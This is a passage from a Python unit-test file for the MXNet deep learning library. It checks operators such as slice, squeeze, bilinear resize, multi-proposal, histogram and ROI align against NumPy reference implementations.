valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
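        # Each output cell (oh, ow) averages the input window
        # [floor(oh * isize / osize), ceil((oh + 1) * isize / osize)) per axis.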
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
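    # NumPy reference: output pixel (h2, w2) maps back to the input coordinate
    # (h2 * (inH - 1) / (outH - 1), w2 * (inW - 1) / (outW - 1)) and is bilinearly
    # interpolated from the four surrounding input pixels.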
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
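    # Backward reference: scatter each incoming gradient back to the four input
    # pixels it was interpolated from, weighted by the same bilinear coefficients.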
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
            data_np_like = x_1.asnumpy()
            check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
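    # feature-map side length for a 1000-pixel image at stride 16 (ceil division)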
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output.asnumpy(),expected,
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1.asnumpy(), np_bins1)
assert_almost_equal(mx_histo1.asnumpy(), np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2.asnumpy(), np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2.asnumpy(), np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
    if is_windows:
        # Windows doesn't support setting environment variables on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
    if is_windows:
        # Windows doesn't support setting environment variables on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
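    # Each entry: [mx symbol builder, numpy forward fn, numpy gradient fn,
    # lower test-range bound, upper test-range bound]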
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
        shape2 = (-1,) + shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number of GPUs here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number
        # of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
